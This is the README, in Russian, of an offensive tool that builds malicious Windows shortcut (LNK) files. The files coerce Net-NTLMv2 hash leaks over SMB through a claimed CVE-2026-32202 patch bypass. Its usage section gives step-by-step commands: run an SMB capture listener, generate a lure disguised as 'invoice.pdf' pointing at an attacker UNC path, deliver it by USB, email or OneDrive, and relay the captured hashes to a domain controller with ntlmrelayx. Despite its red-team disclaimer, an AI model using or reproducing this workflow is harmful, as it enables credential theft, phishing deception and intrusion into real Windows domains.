
Генерирует вредоносные LNK-файлы для принудительного получения хэшей Net-NTLMv2 через обработку UNC в Windows Shell, с пользовательским SMB-прослушивателем и интеграцией ретрансляции для авторизованных операций red team.
Дисклеймер
Этот инструмент предназначен только для авторизованного red teaming и тестирования на проникновение.
Несанкционированное использование против систем без явного разрешения незаконно.
Используйте на свой страх и риск. Автор не несёт ответственности за любое неправомерное использование или ущерб.
Описание
Принудительное получение NTLMv2-хэша через обход неполной защиты Windows Shell (CVE-2026-32202). Генерирует специально созданные LNK-файлы, которые принуждают к SMB/UNC-аутентификации при открытии или предпросмотре в Проводнике. Низкая интерактивность, работает на пропатченных системах, где исправление от апреля 2026 года оказалось недостаточным. Активно используется в реальных проектах.
Ключевые возможности
Что делает эксплойт
Инструмент создаёт специально сформированный .LNK, который злоупотребляет обработкой Shell UNC-путей в Target + структурах IconEnvironmentDataBlock / ExtraData. Когда жертва просматривает папку или наводит курсор/предпросматривает файл, Windows Shell инициирует SMB-подключение к контролируемому злоумышленником UNC-пути, утекая Net-NTLMv2-хэш машины/пользователя. Без выполнения кода на цели — принудительное получение учётных данных для ретрансляции или взлома.
Почему это полезно
Протестировано на
Зависимости
Установка: pip install -r requirements.txt
Использование
# 1. Запуск сервера перехвата (хост атакующего)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. Генерация вредоносного LNK
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# Опционально: стабильный режим или режим обхода
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. Доставка LNK (USB, общий ресурс, вложение в письме, OneDrive и т.д.)
# 4. Ожидание хэша в терминале + файле. Пример ретрансляции:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# или LDAP-ретрансляция для RBCD, HTTP для сертификатов ADCS и т.д.
Эксплойт
Ограничения
Корневая причина (кратко)
Неполное исправление в санитизации UNC-путей Windows Shell и обработке блоков ExtraData для разрешения иконок/целей LNK. Механизм защиты, предназначенный для блокировки несанкционированного сетевого спуфинга, всё ещё запускает NTLM-аутентификацию во время перечисления пространства имён Shell.